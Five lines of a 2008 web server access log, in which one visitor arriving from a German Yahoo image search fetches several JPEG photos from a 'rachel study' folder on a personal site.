84.132.162.83 - - [22/Aug/2008:02:32:36 -0500] "GET /rachel%20study/rachel-12a.jpg HTTP/1.1" 200 58628 "http://de.images.search.yahoo.com/search/images/view?frame=top&back=http%3A%2F%2Fde.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Drachel%2Bpregnant%26ni%3D20%26ei%3DUTF-8%26fr%3Dmoz2%26xargs%3D0%26pstart%3D1%26b%3D441&w=393&h=500&imgurl=tomdolan.pconline.com%2Frachel%2520study%2Frachel-12a.jpg&rurl=http%3A%2F%2Ftomdolan.pconline.com%2Frachel%2520study&size=57.3kB&name=rachel-12a.jpg&p=rachel+pregnant&type=JPG&no=448&tt=1.285&sigr=11b9h03jl&sigi=11j5o0bne&sigb=13f6tv17h""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:36 -0500] "GET /rachel%20study/rachel-08.jpg HTTP/1.1" 200 66867 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:39 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 200 39874 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:39 -0500] "GET /rachel%20study/rachel-04.jpg HTTP/1.1" 200 54495 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:39 -0500] "GET /rachel%20study/rachel-01.jpg HTTP/1.1" 200 67071 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
